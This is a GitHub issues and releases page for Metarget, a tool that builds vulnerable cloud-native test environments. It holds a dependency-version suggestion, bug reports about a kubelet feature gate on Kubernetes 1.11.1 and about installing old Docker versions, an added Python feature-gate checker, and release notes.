    After further analysis, in this project, The version constraint of dependency packaging can be changed to >=14.1,<=21.3. The version constraint of dependency requests can be changed to >=0.2.1,<=0.2.3. The version constraint of dependency requests can be changed to >=0.7.0,<=2.24.0. The version constraint of dependency requests can be changed to ==2.26.0. The version constraint of dependency beautifulsoup4 can be changed to >=4.10.0,<=4.11.1. The version constraint of dependency tqdm can be changed to >=4.36.0,<=4.64.0. The version constraint of dependency prettytable can be changed to >=0.6,<=1.0.1.

    The above modification suggestions can reduce the dependency conflicts as much as possible, and introduce the latest version as much as possible without calling Error in the projects.

    The invocation of the current project includes all the following methods.

    The calling methods from the packaging
    packaging.version.parse
    
    The calling methods from the requests
    requests.get
    
    The calling methods from the beautifulsoup4
    bs4.BeautifulSoup
    
    The calling methods from the tqdm
    tqdm.tqdm
    
    The calling methods from the prettytable
    prettytable.PrettyTable
    prettytable.PrettyTable.add_row
    prettytable.PrettyTable.get_string
    
    The calling methods from the all methods
    core.env_managers.cni_plugin_installer.CNIPluginInstaller.install_cni_plugin
    utils.checkers.docker_specified_installed
    cls._get_kubeadm_token_and_hash
    vuln.get
    version.rstrip.endswith
    cls._act
    flask.redirect
    dict.keys
    fw.write
    version_string.re.search.group.startswith
    int
    flask.render_template_string
    res.stdout.decode.split.pop
    flask.Flask.route
    res.stdout.decode
    core.env_managers.docker_installer.DockerInstaller.uninstall
    os.path.join
    CNIPluginInstaller._install_flannel
    pathlib.Path.unlink
    flask.Flask.run
    print
    utils.checkers.kata_specified_installed
    filename.re.search.group
    re.search
    core.env_managers.kubernetes_installer.KubernetesInstaller.uninstall
    cls._pull_image
    utils.filters.filter_vuln_by_name.startswith
    subprocess.run
    res.stdout.decode.split
    yaml.load.keys
    PIL.Image.open
    pathlib.Path.exists
    package_name.lstrip
    debug_input
    re.sub
    tr.a.get_text.startswith
    deb.split
    DockerInstaller.install_by_version
    cls._pre_configure
    cls._pre_install
    open
    res.headers.get
    os.chown
    cls._get_k8s_images_list
    XXXInstaller.install_by_version
    load_vulns
    utils.filters.filter_vuln_by_name
    sys.exit
    operator.itemgetter
    core.vuln_app_manager.resource_modifier.generate_deployments_with_modifications
    cls.reload_and_restart_docker
    cmds.internal.deploy_vuln_resources_in_k8s
    filename.rsplit.lower
    fr.read
    KubernetesInstaller.uninstall
    werkzeug.utils.secure_filename.rsplit
    debug
    mappings.items
    core.env_managers.kubernetes_resource_deployer.KubernetesResourceDeployer.delete
    version.rstrip.rstrip
    temp_yaml.endswith
    docker_installed
    filter_name_by_regex
    cls._install_with_context
    cls.docker_client.images.get
    yaml.endswith
    context.get
    utils.system.reboot_system
    cls._pull_domestic_image
    dict
    os.readlink.split
    entry.split.strip.sort
    utils.color_print.debug_input
    core.vuln_app_manager.port_manager.allocate_ports
    obj_list.keys
    input
    yaml.dump
    os.environ.get
    KernelInstaller.install_by_version
    core.env_managers.package_list_downloader.download_package_list
    core.vuln_app_manager.vuln_loader.load_vulns_by_dir
    str
    utils.system.mkdir_if_not_exist
    res.stdout.decode.split.startswith
    version_table.find_all
    core.env_managers.kata_containers_installer.KataContainersInstaller.uninstall
    DockerInstaller.uninstall
    utils.checkers.docker_kubernetes_installed
    os.path.join.extend
    show_table
    bs4.BeautifulSoup
    cls.docker_client.images.get.replace
    cls._run_kubeadm
    string.Template
    pathlib.Path.mkdir
    cls._modify_grub
    cls.get_host_ip
    glob.glob
    cls._pull_images
    docker.from_env
    len
    core.env_managers.kubernetes_installer.KubernetesInstaller.install_by_version
    tqdm.tqdm
    utils.checkers.containerd_specified_installed
    core.env_managers.kernel_installer.KernelInstaller.install_by_version
    utils.system.reload_daemon_config
    services_using_ports.index
    CNIPluginInstaller._install_calico
    pathlib.Path
    cls._pull_docker_image
    KubernetesInstaller.install_by_version
    load_vulns_by_dir
    cls._get_kubernetes_cni_version
    shutil.rmtree
    cls._install_one_gadget_by_version
    encode
    re.match
    collections.OrderedDict
    yaml_path.split
    split.append
    _get_next_available_port
    requests.get
    copy.copy
    KataContainersInstaller.install_by_version
    copy.copy.append
    utils.checkers.kernel_specified_installed
    cls._install_by_version_with_apt
    allowed_file
    version_string.re.search.group
    core.vuln_app_manager.resource_modifier.generate_svcs_with_clusterip_to_nodeport
    core.vuln_cn_manager.vuln_loader.load_vulns_by_dir
    XXXInstaller.uninstall
    string.Template.safe_substitute
    entry.get_text
    PIL.Image.open.load
    new_name.split
    f.write
    utils.color_print.warning
    link_target.split.split
    list.append
    utils.color_print.debug
    utils.checkers.gadget_in_gadgets
    cls._pull_k8s_images
    pathlib.Path.symlink_to
    os.getcwd
    ports_usage.append
    werkzeug.utils.secure_filename
    format.split
    flask.Flask
    k8s_version.re.search.group
    cls._image_exist
    prettytable.PrettyTable
    server_string.re.search.group
    flask.flash
    cmds.internal.delete_vuln_resources_in_k8s
    cls._pull_quay_image
    config.k8s_hash_generator.format.split
    entry.startswith
    cls._get_apt_complete_package
    yaml.load
    prettytable.PrettyTable.add_row
    pathlib.Path.touch
    utils.color_print.error_and_exit
    cls._apt_update
    socket.socket.close
    socket.socket.connect
    core.env_managers.kata_containers_installer.KataContainersInstaller.install_by_version
    depends.split
    core.env_managers.docker_installer.DockerInstaller.install_by_version
    cls._get_apt_complete_version
    cls.download_file
    tr.a.get_text
    cls._is_version_available_in_apt
    requests.get.iter_content
    cls._get_k8s_images_list_by_version
    cls._update_k8s_worker_script
    utils.checkers.kubernetes_specified_installed
    core.vuln_app_manager.port_manager.release_ports
    load_vuln
    shutil.copy
    utils.checkers.docker_installed
    kubernetes_installed
    depend.split.split
    os.getuid
    dict.pop
    depend.split
    platform.dist
    res.re.search.group
    cls._fetch_package_list_by_version
    services_using_ports.pop
    depend.split.split.split
    nl_print
    cls._tag_image
    utils.color_print.error
    json.loads
    list
    repo_entry.format.split
    release_ports
    ports_usage.pop
    cls.docker_client.images.get.tag
    core.env_managers.kubernetes_resource_deployer.KubernetesResourceDeployer.apply
    prettytable.PrettyTable.get_string
    socket.socket.getsockname
    format
    f.read
    os.readlink
    mappings.pop
    open.close
    join
    image_file.save
    obj.values
    utils.table.show_table
    json.dumps
    utils.verbose.verbose_output
    cls._pull_domestic_images
    cls._add_apt_repository
    bs4.BeautifulSoup.find_all
    CNIPluginInstaller._install_cilium
    cls.docker_client.images.remove
    os.path.split
    packaging.version.parse
    v.startswith
    config.kata_tar_decompress_dest.format.split
    gpg_url.format.split
    cls._install_cni_plugin
    cls._configure_docker_with_kata
    action.format.split
    set
    download_package_list
    cls._create_k8s_resources
    cls._install_by_version_with_download
    socket.socket
    split
    zip
    image.format.split
    get_img_size
    allocate_ports
    cls._config_auth
    os.getgid
    entry.split
    f.read.strip
    entry.split.strip
    os.mkdir
    grub_option.format.split
    utils.system.create_file_if_not_exist
    action.strip
    ports_used_list.append
    res.stdout.decode.strip
    _get_gadget_version_from_gadgets
    KataContainersInstaller.uninstall
    

    @developer Could you please help me check this issue? May I submit a pull request to fix it? Thank you very much.

    opened by PyDeps 0
  • The default feature gate setting does not work on some k8s versions

    The default feature gate setting does not work on some k8s versions

    Hello, when I used the command ./metarget cnv install cve-2019-1002101 --verbose --domestic to install the cve-2019-1002101 vulnerability scenario, k8s did not start successfully after installation and produced the error shown in the image below. After investigation I found that the kubelet config file sets the feature gate: --feature-gates SupportNodePidsLimit=false (image)

    The k8s version installed by this vulnerability environment is 1.11.1, but this setting only applies from version 1.14 on; it cannot be set on lower versions, which causes the kubelet service to stop. Reference: https://kubernetes.io/zh/docs/reference/command-line-tools-reference/feature-gates/#using-a-feature After deleting this setting and restarting kubelet, the service runs normally.

    bug 
    opened by t1Kun 0
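A defensive check for the failure mode reported in the issue above, written as an added example (not part of Metarget): it parses a kubelet argument string, extracts the --feature-gates value, and reports every gate the target Kubernetes version does not know. The minimum-version table is constructed for illustration and contains only SupportNodePidsLimit (first available in 1.14, as the issue states); gates missing from the table are reported as unknown, and the sample kubelet argument string is constructed too.

```python
"""Check a kubelet --feature-gates value against the Kubernetes version it will run on.

Added example, not Metarget's own code. GATE_MIN_VERSION is a constructed table:
its only entry is SupportNodePidsLimit, which the issue reports as unavailable
before Kubernetes 1.14. Extend it with further gates as needed.
"""
import re
from typing import Dict, Tuple

# Constructed table (assumption for this example): gate -> first (major, minor) that knows it.
GATE_MIN_VERSION: Dict[str, Tuple[int, int]] = {
    "SupportNodePidsLimit": (1, 14),
}

# Constructed sample of the kubelet arguments the issue describes.
KUBELET_ARGS_SAMPLE = "--feature-gates SupportNodePidsLimit=false"


def parse_k8s_version(version: str) -> Tuple[int, int]:
    """Return (major, minor) from strings such as '1.11.1' or 'v1.14.0'."""
    m = re.match(r"v?(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised Kubernetes version: {version!r}")
    return int(m.group(1)), int(m.group(2))


def parse_feature_gates(value: str) -> Dict[str, bool]:
    """Parse 'A=true,B=false' into {'A': True, 'B': False}; reject malformed entries."""
    gates: Dict[str, bool] = {}
    for entry in filter(None, (e.strip() for e in value.split(","))):
        name, sep, flag = entry.partition("=")
        if not sep or flag.strip().lower() not in ("true", "false"):
            raise ValueError(f"malformed feature gate entry: {entry!r}")
        gates[name.strip()] = flag.strip().lower() == "true"
    return gates


def extract_feature_gates(kubelet_args: str) -> str:
    """Return the value passed to --feature-gates ('' if the flag is absent)."""
    m = re.search(r"--feature-gates(?:=|\s+)(\S+)", kubelet_args)
    return m.group(1) if m else ""


def unsupported_gates(kubelet_args: str, k8s_version: str) -> Dict[str, str]:
    """Map each gate in kubelet_args that k8s_version cannot accept to the reason.

    A gate absent from GATE_MIN_VERSION is reported as unknown, because kubelet
    refuses to start on any gate name it does not recognise (the symptom in the issue).
    """
    version = parse_k8s_version(k8s_version)
    problems: Dict[str, str] = {}
    for name in parse_feature_gates(extract_feature_gates(kubelet_args)):
        min_version = GATE_MIN_VERSION.get(name)
        if min_version is None:
            problems[name] = "not in the known-gate table"
        elif version < min_version:
            problems[name] = f"requires Kubernetes {min_version[0]}.{min_version[1]}+"
    return problems


if __name__ == "__main__":
    # Run the check against the constructed sample for the version the issue names.
    for gate, reason in unsupported_gates(KUBELET_ARGS_SAMPLE, "1.11.1").items():
        print(f"kubelet would not start: {gate} {reason}")
```

Running the check before writing the kubelet unit file turns the silent start-up failure from the issue into an explicit message naming the offending gate; an empty result means every configured gate is known to the table and old enough for the target version.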
  • Dependency problem when installing low-version docker

    Dependency problem when installing low-version docker

    Hello, when I used the command ./metarget gadget install docker --version 17.01 --verbose to install docker 17.01, it reported that the installation succeeded, but nothing was actually installed. I later found that the docker repository added by the tool contains no packages for the low versions; you need to manually add deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable and then update before docker versions below 18 can be installed manually.

    This happens when a vulnerability environment requires a docker version below 18.

    bug 
    opened by t1Kun 0
Releases(v0.9.1)
  • v0.9.1(Dec 31, 2021)

    In May 2020, Metarget was open-sourced and has been used by many cloud native security researchers since then. We also obtained lots of contributions from the community. Thank you!

    • adopt semantic versioning
    • some cnvs and appvs added
    • ...

    Stay tuned :)

    Source code(tar.gz)
    Source code(zip)
  • v0.5(Jun 3, 2021)

  • v0.4(May 19, 2021)

    • some bugs fixed; thanks to @duowen1 and @Kfzz1
    • now we are starting to implement metarget target!
    • stay tuned for further updates and releases :)
    Source code(tar.gz)
    Source code(zip)
  • v0.3(May 7, 2021)

  • v0.2(Apr 28, 2021)

  • v0.1(Apr 25, 2021)

Owner
rambolized
IT Security Researcher